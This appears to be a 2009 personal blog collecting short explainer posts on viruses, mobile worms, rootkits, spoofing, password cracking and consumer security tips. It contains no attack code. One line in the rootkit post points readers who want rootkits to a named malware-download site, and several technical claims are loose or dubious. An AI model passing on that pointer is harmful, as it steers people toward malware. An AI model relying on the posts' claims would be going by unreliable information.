Crazy Boot virus is a stealth virus. If you try to examine the infected boot sector, it displays the correct boot sector information. It also displays the message:

DON'T PLAY WITH THE PC!
OTHERWISE YOU WILL GET IN 'DEEP, DEEP' TROUBLE!. . .
CRAZY BOOT VER. 1.0

There is a very low chance for a computer get infected bu the Crazy Boot virus today since the era of floppy disk is almost over and due to the security measures included in the Windows available today in the market. It is very risky to disinfect the boot sector using the FDISK/MBR. It is because Crazy Boot virus will not place the MBR in its correct location. But the location is known to Crazy Boot virus. It is better to use a proper antivirus to remove the virus.

The Latest Computer-Virus Victim - Macromedia Shockwave

2009-06-23T00:23:00.001-07:00

You may be familiar with the .swf files. They are created using the Macromedia Flash. They are used to create animations. I have also created some small flash movies. The swf file contains some audio and video data that deals with the animation. The file is very compact that they can be used in many web based applications. Several websites including those owned by the multinational companies uses flash animations to make their website more attractive and user interactive. One of the example is the esnips.com. the site uses the flash file to allow the user to upload the files. You can also see an attractive animation that involves good user interaction in the website of the company Hero Honda. More over flash allows one to create small applications. The flash gives a lot of functions for the user to create the applications very easily and can accomodate complex functions. The applications created using the flash is more attractive than created using java or cpp. The usage of the flash in the website is considered more secure than including video. But the recent reports by the Kaspersky anti virus firm proves it to be wrong. SWScript.LFM, which is the first malicious program that infects the popular multimedia format, Macromedia Shockwave.For spreading, this malicious program requires several important conditions, whose simultaneous execution is highly unlikely. First of all, LFM requires a PC that has been installed with a full program version that executes Macromedia Shockwave files - special plug-in versions installed on Internet Explorer and Netscape Navigator by default are not enough for the virus to operate. Secondly, a user has to manually download the infected SMF file to his computer and start it up. Thirdly, fortunately LFM is only capable of infecting SMF files located in the same directory as the file-carrying virus. Kaspersky Labs considers the possibility of an epidemic outbreak caused by the LFM virus to be very unlikely. May be this starts the new era in the computer virus which can spread more than other virus since many websites uses flash based applications.
Defense procedures against LFM have already been added to the Kaspersky Labs daily anti-virus database update as of January 8, 2002. You will get a more detailed information about this malicious program is available in the Kaspersky Virus Encyclopedia.

Blogged with the Flock Browser

Commwarrior Mobile Virus

2009-06-21T20:48:00.001-07:00

Commwarrior is a mobile worm developed to infect the mobiles running on the Symbian OS. It was first discovered in Russia. It uses Bluetooth and MMS as the medium for spreading. Commwarrior.A checks the system cloack and decides which application can be used for the spreading. But Commwarrior does not use this method. The worm reads the mobile numbers from the address book of the infected mobile and sends out the virus files via Bluetooth and through MMS. Normally if a virus starts spreading, the users can be warned against the virus if the name if the infected file that the virus will sent to the other mobiles. The Commwarrior cannot be prevented by this manner. It can name the infected files with different names as the parent names his child. Since the different infected files have different names, the users cannot be warned aginst receiving the infected file. Usually the multimedia files are send through the MMS. So the users have the feeling that the files received through the MMS are more secure since the images and video have a minor probability to be a virus. But unfortunately the Symbian installation files can be sent through the MMS. This feature (may be loop hole) is used by the worm for infecting the other mobiles. So be carefull about the files you received in the mobiles. Always check whether the file is sent with the knowledge of the person from whose mobile you received the file.

Spreading through Bluetooth

Commwarrior spreads through bluetooth using the SIS files that have different names. The SIS file contains the worm main executable commwarrior.exe and boot component commrec.mdl. The SIS file contains autostart settings that will automatically execute commwarrior.exe after the SIS file is being installed.
When Commwarrior worm is executed it will start looking for other bluetooth enabled devices. If a device is found, it send a copy of itself to each of these phones one after another. If target phone goes out of range or rejects file transfer, the Commwarrior will search for another phone. The Commwarrior worm will look for new targets after sending itself to the first target, thus it is able to contact all phones in range.
Replication over MMS

Spreading though MMS:

Commwarrior spreads through the MMS by sending MMS messages that contains the infected SIS file to other users whose mobile numbers were in the address book of the infected mobile. The MMS messages contain variable text messages and Commwarrior SIS file with filename commw.sis. Unlike in bluetooth spreading, the SIS file name is constant, otherwise the SIS file is identical to the one sent in bluetooth spreading.

Disinfection:
The easiest way for disinfection is the use of the anti virus software for the mobile phone and it will remove almost all the viruses in your mobile phones. Several companies like F-Secure are providing softwares for the removal of the mobile phone viruses. For downloading the software, open the browser in your mobile and navigate to : http://mobile.f-secure.com. Click on the link "Download F-Secure Mobile Anti-Virus" and then select your phone model. Then download the file and then install it. After installing go to the menu and open the antivirus and scan the mobile phone for virus. The software will detect the viruses and removes it. But to kill the running Commwarrior process, the mobile phone must be restarted. You will get a detailed description about the manual removal from:
http://www.cell-phone-viruses.com/1124211683-commwarrior-virus-manual-removal.html

Blogged with the Flock Browser

Duts Mobile Virus

2009-06-19T05:24:00.001-07:00

After the invasion of the Cabir, a new mobile virus called WinCE/Duts was discovered in July 2004. One of the interesting characteristics of the virus is that it first asks the user for permission to infect the files. When an infected file is executed, the virus pops up a message box asking:
Dear User, am I allowed to spread?
When the user press "Yes", the virus will infect all the EXE files in the current directory. Duts contains two messages that are not displayed:
This is proof of concept code. Also, i wanted to make avers happy.
The situation when Pocket PC antiviruses detect only EICAR file had to end ...
Duts is a 1520 bytes long program written in the assembly language for the ARM processor. It affects the devices running on the Windows CE Operating System.

Blogged with the Flock Browser

Skulls Mobile Virus

2009-06-17T22:57:00.000-07:00

I have given a brief idea about the viruses affecting the mobile phones. Skulls is one of the notorious trojan that affect the mobile phones. Skulls is a SIS file trojan that affects the phones running on Symbian OS. The virus replaces the applications installed in the phone with the non-functional versions so that the phone became almost useless.
Most people wanted to make the user interface of the mobile phones more attractive. For this purpose they install themes. Sometimes the installed theme file may be "Extended theme.SIS" which informs you that it is the theme manager for Nokia 7610 smart phone. Then beware-you may have installed Skulls virus. After the Skulls get the control of your mobile, you will see all the icons of the applications in the menu will be replaced by the image of skulls. I have provided a screenshot below:

Fortunately Skulls allows to make and receive calls. But all other application including SMS and MMS will be disabled by Skulls. If you find that your phone contains Skull virus it is more important that you should not reboot your phone. Rebooting the phone will make it difficult for removing the Skull virus.Skulls trojans are targeted against Symbian Series 60 devices, but it can also affect other Symbian devices, for example Nokia 9500, which is a Series 80 device. However when trying to install Skulls trojan on Nokia 9500, user will get a warning that the SIS file is not intended for the device, so risk of accidental infection is low.
For manual removal of Skulls from a compromised device, it is necessary to reinstall all overwritten applications. The SymbOS/Skulls SIS installer must then be deleted. If this does not restore the phone, a formatting the phone may be necessary. All data saved in the C drive will be lost during a format.

Mobile Viruses

2009-06-17T00:58:00.001-07:00

The mobile phones have become a part of our life. Now it is hard to image a day without mobile phones. As the technology advanced, the mobile phones became more and more sophisticated and became more user friendly and includes lots of functions. mobile phones keep as always connected to our dear ones. Even the mobile phones creates small radiation problems, people ignores it and becomes victim of the harmful diseases. But the number of peoples using the mobile phones is increasing day by day. This put the mobile phone manufactures in tough competition. So the manufactures develop new variety of phones. Thus today's mobiles phones can be called as a mobile computer since it corporate almost all the functions of the personal computer. Most of the costly mobile phones are using advanced Operating Systems like Symbian OS, etc. They allows the user to even connect to the internet. The growth of the mobile phone technology in the constructive side gives birth to its destructive side also. Thus the viruses for the mobile phones and PDA took birth. Fortunately the mobile phones which run on Operating Systems that is made entirely for that specific series of mobile phones are almost safe from the virus attack. But the blue tooth enbled mobiles are becoming the victim of virus attack.
A mobile virus is a electronic virus that infects mobile phones or the wireless enabled PDAs. The first case of a mobile virus was reported in June 2004 when it was discovered that a company called Ojam had engineered an anti-piracy Trojan virus in older versions of their mobile phone game Mosquito. This virus sent SMS text messages to the company without the user's knowledge. This virus was removed from more recent versions of the game; however it still exists on older, unlicensed versions. These older versions may still be distributed on file-sharing networks and free software download web sites.
In July 2004, computer hobbyists released a proof-of-concept mobile virus named Cabir. Cabir is also known as EPOC.cabir and Symbian/Cabir that is designed to infect mobile phones running Symbian OS. When a phone is infected with Cabir, the message "Caribe" is displayed on the phone's display, and is displayed every time the phone is turned on. The worm then attempts to spread to other phones in the area using wireless Bluetooth signals. The worm was not sent out into the wild, but sent directly to anti-virus firms, who believe Cabir in its current state is harmless. However, it does prove that mobile phones are also at risk from virus writers. Experts also believe that the worm was developed by a group who call themselves 29A, a group of international hackers, as a "proof of concept" worm in order to catch world attention. It failed to infect any of its targets. The worm can attack and replicate on Bluetooth enabled Series 60 phones. The worm tries to send itself to all Bluetooth enabled devices that support the "Object Push Profile", which can also be non-Symbian phones, desktop computers or even printers. Symantec reports that the worm spreads as a .SIS file installed in the Apps directory. Unlike actual PC worms, Cabir does not spread if the user does not accept the file-transfer or does not agree with the installation. F-Secure reports that some phones, at least, warn the user about an unverified supplier.[1] So, like many other worms, this sample also needs a good portion of social engineering to reach its goal. While the worm is considered harmless because it replicates but does not perform any other activity, it will result in shortened battery life on portable devices due to constant scanning for other Bluetooth enabled devices. Mabir, a variant of Cabir, is capable of spreading not only via Bluetooth but also via MMS. By sending out copies of itself as a .sis file over cellular networks, it can affect even users who are outside the 10m range of Bluetooth.
In March 2005 it was reported that a computer worm called Commwarrior-A has been infecting Symbian series 60 mobile phones. This worm replicates itself through the phone's Multimedia Messaging System (MMS). It sends copies of itself to other phone owners listed in the phone user's address book. Although the worm is not considered harmful, experts agree that it heralds a new age of electronic attacks on mobile phones.
The other known mobile viruses are: Duts, Skulls, Commwarrior, etc. The details of these viruses will be published later.

Blogged with the Flock Browser

Actifed Computer Virus

2009-06-12T22:33:00.001-07:00

Actifed virus is a type of G2 generated encrypted computer virus. As normally the virus is loaded in to the memory by executing an infected program and then it affects the runtime programs and then corrupts the program files.This virus affects the .COM and .EXE file but does not affect the command.com. G2 generates compact, easily modified, fully commented, source code of .COM and .EXE infectors. It also supports the creation of resident and non-resident encrypted and non-encrypted viruses. The PS-MPC has similar use.

Blogged with the Flock Browser

Computer Virus Sinowal

2009-06-01T06:18:00.001-07:00

Kaspersky reports that the virusthreat has increased during the month of April 2009. The new malwares exploit the security flaws in Adobe Acrobat Reader of the pdf software or the Neosploit rootkit. According to the researchers the detection and the cure of the rootkits is a very difficult problem faced by the antivirus experts.
Kaspersky Research Lab has detected a fresh version of the Sinowal at the end of March 2009. Sinowal is a vicious code that remains itself hidden in an infected computer by infecting its Master Boot Record (MBR). Sinowal plants itself in the lowest level of the Operating System. It infects the MBR and bypasses the antivirus software. The e-mails were considered as the main medium for the spreading of the malwares through the internet. But the infection through the website has increased 300% by the year 2008. Now the malwares redirect the search results and confuses the user. Kaspersky recomends its users to make their antivirus up-to-date and scan for the malware. If any malware is found, system will have to be restarted while undergoing treatment.

Blogged with the Flock Browser

Software Firewall

2009-05-30T01:02:00.001-07:00

You may have heard the term firewall. If you have a network of computers (say 50 computers in the network) you will implement a firewall to protect your network from the cyber attacks. A firewall controls the ports that are used to communicate with the network. You can implement your own laws concerning the security of the network. You can allow the FTP to restricted number of computers. You can also regulate the computer from visiting certain restricted sites. If the network is large the security must be as tight. But what about the case of one or two computers connected to the internet ? The software firewall is the solution. Te software firewall examines the ports connected to the internet and regulates it. It also asks the user whenever an applicayion installed in the computer try to access the internet. Thus we can prevent unwanted usage of the internet by the unknown application. This also saves our band width. The usage of internet connection by the unknown application is generally a trojan or spyware.
The usage of the software firewall is not limited to the small network. It is also used in the huge network to regulate the usage of the internet by the employees.

The firewall uses the following ways to prevent the unwanted data transfer through the internet.

Proxy Service: The information received from the internet is received and it is forwarded to the requesting system. It can also receive the information (request) sent by a computer in the network and forward it to the corresponding destination.
Packet Filtereing: The information to be sent are breakdown into small units and are converted to packets. These packets are first received by the firewall and checks it with a set of predefined filters. The firewall allows only the trusted packets to pass to the requesting computer.
Stateful Inspection: It is a newer method. It does not checks the whole packet. Instaed it checks for only certain parts of the packet. It checks specific part of the data while sending the request and compares it with the incomming packets. If a match is found the packet is considered as a trusted packet and allowed to pass through the network otherwise it is blocked.

Blogged with the Flock Browser

Computer virus strikes US Marshals, FBI affected

2009-05-24T21:43:00.000-07:00

A mystery computer virus affected the computer networks of the US Marshals and FBI. Both of them had shut down their network to prevent further spreading and destruction. The computer network have been disconnected from the Justice Department as a preventive measure. The problem of virus starts in the Thursday. The origin of the virus has not been identified. Besides the external network, the law enforcement department has its own internal network to prevent the snoopers from accessing the sensitive data. The internet access and e-mail services of the US Marshals and FBI had been disabled while the staff worked on the problem.

Resident Virus

2009-05-21T02:46:00.000-07:00

As you know a virus will normally infect an executable file and it will be executed when the infected file is executed. According to the mode of infection the viruses are divided into resident and non-resident viruses. The non resident virus has a module to find the files that it can infect and it also has another module called replication module which will infect the file encountered by the finding module. After infecting a particular file the virus will be executed when the infected file is executed.
In the case of the resident virus, the thing is different. They first infect a file or executed by some other means. When they are executed it loads its replication module into the memory. By working in the memory it is capable of infecting the files to a great extend. So there are two types of resident viruses- those which are capable of infecting large number of files in a short duration called fast infectors and the other that infects less number of files. The fast infecting type virus is somewhat more dangerous since it infect more potential programs in a short duration. If the infected potential files include the files of the antivirus then there is a chance of infecting the files scanned by the antivirus. The fast infecting virus shows the symptoms of infection very soon, mostly by slowing down the PC. There are antiviruses that will be active when there is an abnormality is identified and it will disinfect the infected file. In the case of slow infectors, they do not show the symptoms of infection as slowing downing the PC. This makes them less chance to be identified by the antivirus. But do not remain unidentified forever. Since it shows the signs of infection very late, they are identified very late. However it is less dangerous than that of the fast infectors.

Crimeware

2009-05-17T05:28:00.000-07:00

Crimewares are applications that are developed to steal the personal information or to commit a crime. Usually crimeware are used to steal money from the accounts of the companies or the traders that makes the thief richer. Crimeware uses several methods. The attacker can use a keylogger trojan fro stealing the kestrokes from the user. The user may be an employ of a bank or other finantial institution. The attacker can use this stealed information for his job. Another method is by redirecting the user to a fake website even if the user has entered the url correctly. the crimeware allows the attacker to wait till the user login in to his account and the he can steal the information without identified by the user. The crimeware can steal password from the cache of the browser. The crimeware uses the vulnerabilities in the applications that uses internet connection. The attack may also in the form of an e-mail which provides fake sender details.

Password Cracking

2009-05-16T07:45:00.000-07:00

Password cracking is the process of recovering the password. Usually password cracking is used to find out the password lost by the user. Like every development in the technology, this is also used for illegal purposes. Password cracking is used for hacking purposes. Password cracking is used for determining the active passwords of the email by the attackers. The password they crack include passwords of the website, computer, domains etc.
In most of the networks authentication is used to allow the limited access to the network. The authentication is generally done by using the user name and password. Without the user name or password a computer is not allowed to access the network. In most cases the password is not stored in the plain text form. The password in the plain text form is more vulnerable to attack. For the security reasons the password is encrypted. Encryption is done in different method is the password is mixed with certain data and the resultant form is stored in the corresponding database. If an attacker gets this encrypted password it will be easier for him to find out the original password.
One of the method of password cracking is by guessing. If the attacker knows a user he guesses the password by simply checks the password by giving the names of the friend, pet,favorite celebrities etc. The other type of guessing involves the trial and error method using the common password words like admin,administrator, password, passcard etc.
Another type of finding password is by using a software which generates the password like words from the dictionary. A good percentage of the people creates password from the words in the dictionary. Some people may prefix or postfix a digit which is usually 1.
The another type of attack is the brute force attack. This has higher chance of success if the password is small. That is why the most of the sites requiring authentication asks for password with more than 6 characters. The brute force attack uses every words that may have the chance for becoming the password.
Precomputation is another method of finding password. This method involves hashing of each word in the dictionary and stores it. This way when a new encrypted password is obtained password recovery is very easy.
The password cracking can be prevented by using the high encryption during the transmission. In the case of password stored in the system, the password must be accessible only to the trusted applications.

Know your Computer's internet security

2009-05-14T23:12:00.000-07:00

You may know that a computer can communicate with other computer only through the ports. A computer can be connected to the internet only through the ports. A computer has thousands of ports. But we require only a fewer ports. If a remote computer needs a port, it sends request to the computer for accessing a particular port. Each port is identified by its port number. The computer receives the request and allows the program in the remote computer to access the computer. This is the normal case. I mean the ideal case. But the programs in the remote computer are human created and so there is a chance for the presence of the error. Moreover some programs are malware that uses the trusted programs to get in to the computer. By closing the unnecessary ports we can prevent the remote computer from accessing our computer up to a limit. But this will not protect your computer completely from the attacks through the internet. This only reduces the chance of attack through the internet connection. For knowing which ports are opened and which are closed visit: http://scan.sygate.com/
If you use a firewall software you can manage the programs from accessing the internet. You can block the unwanted programs from accessing the internet. But the presence of rootkits can even cheat the firewall

Want to know about Rootkits ?

2009-05-14T03:13:00.000-07:00

You may noticed that while you perform scan for the virus with an anti virus software, it may sometimes display Rootkits found. Want to know about the Rootkits? Here is a small description about the Rootkits. Rootkit is a software which is a program or a combination of more programs that are designed to hide the fact that a system has been compromised. The rootkits are to be installed by the attacker in the target machine phisically by himself or by exploiting the system vulnerabilities. Once the rootkit is installed in the target system, the attacker can modify the system files and hide the running process of the attacker installed files. The rootkits often forms a back door in the system allowing the attacker to steal the data from the system without knowing the user.
Actually Rootkits are evolved as a software to handle the system when the system falls in to a non-responsive state. Later the hackers have turned this to a malware. The applications which creates the virtual devices like Demon Tools uses the Rootkits to hide certain system activity and to supress certain process of the system. The Kaspersky antivirus uses the rootkits to hide and protect their files from the attack of the malwares.
Most antiviruses are not capable of finding the rootkits. Even some of the antiviruses found certain types of rootkits, they cannot find all types of the Rookits. Fortunatley softwares for finding the Rootkits (like Rootkit Revealer) are available in the market for finding and deleting the Rootkits. Most of the Rootkits are installed in the target machine by the user in the form of patch or key generator. Lots of Rootkits are available in the internet for downloading. If you want one visit: http://vx.netlux.org/.

Make e-banking more secure...

2009-05-11T19:45:00.000-07:00

We are familiar with the stories of several people who lost their money via e-banking. The banks are stepping up security as the cases of money loss through the e-banking increases. But in most case the money loss is due to the unawareness of the user rather than the security provided by the banks. Here are some tips that would helpful in increasing your security in e-banking:

* Do not use computers in internet cafe or computers in other institutions that you found less secure. It is always better to use your own personal computer for this purposes. The computers in internet cafe has less security as it contains lots of malware or spywares and viruses. It may steal your account details and sent this details to the hacker. These details will help the hacker to take money from your account easily. Some computers in the internet cafes are installed with anti virus softwares. But do not trust this as a high secure because in most internet cafes the anti virus softwares are not updated periodically. This softwares cannot prevent newly formed spywares.
* Use a good anti-virus software in your computer. It is more important that you must update the anti virus software periodically. This enables the software to detect more and more viruses and thus increase the security of your computer.
* Use a firewall other than windows firewall so that we can monitor the usage of internet by the programs in the computer and can block the programs that does not require internet connection.
* Always go to the website by typing the URL in the address field directly. Do not go to the website through the search engine, as it may lead to the spoofed website. The spoofed website may look similar to the original website so that the user believe that he has reached the original website. The user will enter the details in the spoofed website and his money will be utilized by the hacker. It is also important to check whether you have entered the correct address or not.
* Use a good browser like firefox or internet explorer for browsing.
* Do not save passwords in the browser. The saved password can be stealed by the hacker by understanding the algorithm of the browser.
* Also check whether the prefix of the URL in the address field is https instead of http.

Website Spoofing

2009-05-08T07:26:00.000-07:00

Website spoofing is the practice of creating website as a hoax. The reader feel that the website was created by a different person or organization. In most cases the readers reach these sites by making small mistakes while entering the URL in the address bar. For example if the user enters www.virsu.com instead of www.virus.com, he may reach the spoofed site. (This is only an example and doesn't mean that www.virsu.com is a spoofed site.) URL redirection is a technique used for spoofing. URL redirection is generally used to redirect a user to a specific website. ie, to have more URLs for a specific website. These facility is illegally used for spoofing. Another method used is the usage of control characters. The control characters are non-printable characters that are represented by ASCII codes. The main motive in website spoofing is to publish false information regarding a person or authority or organisation.

e-mail spoofing

2009-05-07T22:37:00.000-07:00

e-mail spoofing is a technique used to sent the spam mails. In e-mail spoofing the sender address and the other parts of the e-mail header are modified in such a way that the recipient feels that the e-mail was from a different source. If the attacker requires response from the recipient, he adds his e-mail address to the reply to field. This is helpful in finding the attacker. But in some cases the attacker mounts false address in the place of the reply to field. In such cases the the reply of the recipient may badly affect the innocent third person.
There are softwares that generate random e-mail addresses for the attacker to use. If the recipient finds the origin of the email, it is rare that the e-mail is active. Some of the worms uses mass mailing. Here the worm infects a user. When the user opens the e-mail, it triggers the worm and the worm will start reading the address book of the user and then sends e-mail to the other users whose address is in the address book of the first user. If the gateway blocks this infected mail, a message showing that a virus has been blocked.

IP Address Spoofing

2009-05-06T07:38:00.000-07:00

The protocol that is generally used to communicate between the systems is Internet Protocol (IP).
The data is sent through the internet in the form of packets. Each packet has a header which contains general information about the packet. The header of the packet in the IP contains the source address and the destination address. The source address is generally the IP address of the system from where the packet is sent over the internet and the destination address is the IP address of the system to which the data is sent. In IP address spoofing the source address in the header is replaced by a false address and is sent to the target system. The responce from the target system is sent to the false address. The attacker may be able to predict the responce from the target machine or he can direct the responce to his IP address.
The IP spoofing is usually done in Denial of Service (DoS) attack. Here the attacker doesn't need to know the responce of the target machine. He need just to sent the packets to the target with false address. Each packet to the target may be fixed with diferent false source address. So it is difficult to filter the unnecessary packets.
It is difficult for the attacker for attacking a system which requires authentication, but it is possible to attack the target to some extend. In some networks for example in the case of a network in the bank every system is interconnected and it may not require authentication to communicate between these systems. If the attacker wins in gaining access to one of the system in the bank, he can simply attack the whole network.
One of the method to prevent spoofing is to filter the incomming and the outgoing packets. The gateway to a network usually perfoms ingress filtering, which will prevent the data comming from the outside network with source address within the network. Similarly the gateway performs engress filtering which prevents the packets with source address outside the network. These measures prevents the spoofing only to some extend.

Cyber Spying

2009-05-05T07:00:00.000-07:00

Cyber Spying is the practice of stealing data or information from a computer without the knowledge of the owner. The Cyber Spying targets competitors, government,enemies, economists, politicians etc. Cyber Spying may be done on a computer located at far away from the attacker. Cyber Spying can be done with the help of several malicious softwares including virus, trojan, spyware etc. The Cyber Spying is done at work place by a computer professional or at home by a trained professional hacker. Cyber Spying is done by infiltrating in to the computer network in the illegal way. There were strong laws to prevent Cyber Spying.

You will get a detailed information from :

http://www.rainbowskill.com/internet-fundas/all-about-chinese-cyber-spying.php

A zombie computer

2009-05-03T19:05:00.000-07:00

Many people knew that a hacker can use a computer connected to internet for his illegal purposes. Such computers which are connected to the internet that obeys a hacker via a virus or trojan is called a zombie computer. The computer became a zombie when a virus or trojan gets installed the computer. There may be several such computers working simultaneously for a particular hacker. This makes it difficult to trace the hacker. Since the owner of the computer is unaware of this, the computer is known as zombies.
Zombies are generally used for sending spam emails and for the spreading of the trojans or computer viruses. This help the spammers not only to save their bandwidth cost but also to remain undetected. Certain hackers use zombies to commit click fraud against the sites displaying the pay per click advertisement. The hackers use the zombies for the Denial of Service (DoS) attack. Here the hacker sends unnecessary packets to the targeted website so that the legal users cannot access the website. The intense flooding can be easily found out and prevented, but the pulsating flooding remain unidentified for several months or years. The DoS attack is even done against the top sites like yahoo,ebay etc.
Network Intrusion-prevention systems (NIPS) are usually useful for preventing, detecting and blocking zombie computers.Computer users frequently perform backups and delete suspicious mail messages as preventive measures against infection.

Conflicker : Want to know more ?

2009-04-30T07:35:00.000-07:00

Most of the computer users were afraid of Conflicker worm. Conflicker is a worm that affects the computers running on windows. Conflicker exploits the vulnerabilities of windows that became the headache of many computer users. The name conflicker is derived from the words 'configure' and the German word 'ficker' which means fucker. Conflicker was discovered in November 2008. It propagates through the internet and exploits the vulnerability of network services in windows (windows 2000,windows server 2003, windows XP, windows vista and windows server 2008. Microsoft has released the patch to counter the conflicker. Conflicker has 5 varients: A,B,C,D and E.

Symptoms of infection
In 13 February 2009, Microsoft is offering a $USD250,000 reward for information leading to the arrest and conviction of the individuals behind the creation and/or distribution of Conficker worm.

Protect your PC from conflicker

2009-04-29T03:13:00.000-07:00

There are several ways to protect the PC from conflicker. Since it affects PC's running on Windows, most PC users are troubled with it. The methods of protecting the PC from conflicker is the common procedure for the removal of virus.

Use a good and updated anti-virus software that is capable of detecting and healing the infected areas.
Download latest patch from the Microsoft's website.

Link is - http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Turn on the firewall.
If a outbreak of conflicker (or any other virus) in future is predicted, save a backup copy of all the data in your system to an external storage device like CD or DVD.

DeepFreeze: Substitute for antivirus software

2009-04-20T22:11:00.000-07:00

Most people install anti-virus and does not update it. This will give chance to the new viruses to escape from the virus scan done by the anti-virus software. Some anti-viruses even updated may do not have the virus signatures so the presence of certain viruses will not be discovered. A software by Faronics Corporation removes the difficulty for updating the anti-virus software. DeepFreeze is not an anti-virus software. But it will prevent the attack of the viruses very efficiently.

The DeepFreeze allows the user to freeze the drive he wants including the drive in which the operating system is installed. After freezing the drive we cannot save or make changes in data or files in the freezed drive. We can save a file in the freezed drive. But during the system restart the file will be lost. While saving a file in the freezed drive, no warning will be displayed about the loss of data during the next restart. So the usage of DeepFreeze must be done in a careful manner.
We can save a file or install a software permanantly in the freezed drive only after making the DeepFreeze in Thawed mode. For making the DeepFreeze in the Thawed mode press shift and click on the icon of the DeepFreeze in the system tray. A window will appear on the screen. The set a password and then you can chabge the DeepFreeze to Thawed mode in a few mouse clicks.

Google News Alert Virus

2009-04-17T02:47:00.001-07:00

Almost all the internet users trust Google for their services. Now the hackers are exploiting this trust. People who want to be in touch with the latest events they activate the Google News Alert. But recently a new virus emerged by the name Google News Alert.
The virus is sent to the victim in the as email same as that of the Google news alert. When the victim opens the mail there will be an article with a link. If the victim clicks on the link, he will be taken to a website. Then a pop-up will come informing that your system is infected with a virus. For removing the virus you have to download some anti viral softwares. The pop-up contains provision for downloading the anti-viral software. If the user allows the computer to download the anti-viral software will result in the installation of the computer virus in the victim's system.
Due to the increasing number of cyber attack it is hard to keep the computer away from the viruses. However taking prevention will reduce the number of attacks to a great extend. So be careful in using the internet. You will get a detailed idea of the above post from:

www.fusionauthority.com/news/4763-google-news-alert-virus.htm

Virus attack on DPS Computer System

2009-04-17T02:35:00.000-07:00

One of the computer systems of the Texas Department of Public Safety was infected by a virus. The virus affected internal communication systems and also some of the external communication system. The external service that got affected includes the issuance of the Texas drivers' licenses. Fortunately the database on which Texas police agencies depend for checking for identities, warrants and criminal records is unaffected by the virus. The authorities reported that about 80 percent of the offices have had the computer service restored.

Facebook under attack of two malware applications

2009-03-02T23:06:00.000-08:00

Two malware applications are suspected to have hit Facebook in the duration of a week, possibly reading thousands of personal details. The latest application is said to be posting notifications on user's profile that say, "[Name on friend list] has just reported you to Facebook for violating our terms of service - this is your official warning. Click here to find out why you were reported." This statement will surely make the victim to click on the link. The link in the notification leads to an application named "Facebook - closing down" which, once installed, will send the same message to every one of the users' friends The first application hit users over the weekend, sending out notifications to users that one of their friends had "faced some errors" when checking their profile. Users were prompted to click a link to view the error message.Facebook applications need to ask the users' permission before they can access the personal information on their profile, but the rogue application redesigned the permission-requesting page so users did not know what they were clicking on. The application then suggested that users check their friends profiles for errors, helping the application to spread.

Keylogger Trojan

2009-02-24T23:06:00.000-08:00

Keylogger Trojan is a malicious program that steals your user name and password and logging them to a file and send to the attackers. Some keyloggers are available in the market for buying. They are generally used by the parents to track the online activities of their children and also by the people who want to track the contacts and online activities of their life partner. Some keyloggers are capable of monitering your web browser. If a desired responce is found it tracks the required information and sent to the remote attacker. The desired responce may be the opening of a site of the bank in which you may have a account. Some sites requires pointing by mouse rather than the keystrokes. This reduces some of the attack. But some trojans send the screenshot of the victims application to the remote attacker.
The keyloggers are installed in the victim's machine by making him belive that they are useful software. The most of the infection are through the P to P network.
To avoid the infection connect only to trusted network. Download softwares only from trusted sources. Use an updated Antivirus software and install a firewall.

Nuker

2009-02-20T19:17:00.000-08:00

Nuker is a trojan that allows attacker to reboot, shut down or even crash the victim's computer which is connected to the internet. In most cases the nuker requires only the IP address of the target computer. When the attacker enters the IP address of the victim, the nuker sends some packets that made the victim's computer to restart, shut down or even to crash.

Removal of Nuker

The removal of Nuker is not so difficult. Most of the anti viruses available in the market is able to delete the Nukers. It can also be deleted manually. For manually disinfecting the nuker, we have to approach in different methods for different Operating Systems. The best way is to delete the malware manually and to reboot the computer. In Windows 9x and millenium Operating Systems just go to the command prompt and delete the file using the command DEL. eg. if the file name is nuke.exe in the windows folder, then just type:
DEL C:\WINDOWS\NUKE.EXE
and press ENTER key. Then reboot the system.
The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

In the case of Windows NT, 2000, XP the first thing to be done is to rename (including its extension) the nuker and then restart the computer and then delete the file manually.

The manual disinfection is a risky process. So it is adviced for the users who have thorough knowledge about the operating system.

Note that you have to disable the system restore before manual disinfection. While renaming the file the Operating System will copy the original files to another folder for back up. This may result in the disinfection failure. So system restore must be disabled.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

Trojan. Dropper

2009-02-19T23:15:00.000-08:00

Trojan. Droppers are trojans that instals in a system without the informing the user about their presence. Usually virus writers and hackers create trojan droppers to install other applications or placing the backdoor applications. It was discovered in february 2000. It is also known as virus.dropper. It affects Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP. However the threat level is low and can be easily removed.

However prevention will reduce the risk of infection. Some of the preventive measures are given below:

Use a firewall to block all the applications that are trying to connect the internet without your permission. This will reduce the risk even after the infection.

If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.

Isolate the infected computers quickly to prevent the trojan from spreading further. Perform a forensic analysis and restore the computers using trusted anti-trojan software.

Enforce a password policy. Complex passwords make it difficult to crack password files on infected computers. This helps to prevent or limit damage when a computer is infected.

Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.

Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available. I have put a post on disabling the autoplay in XP and vista earlier.

Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.

Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.

If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied. Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.

Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.

Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.

It is recommended to disable the system restore. You will get more information about enabling and diabling the system restore XP and other OS.

Disable or enable Windows Me System Restore

Disable or enable Windows XP System Restore

French Fighters Grounded by Computer Virus

2009-02-19T01:31:00.000-08:00

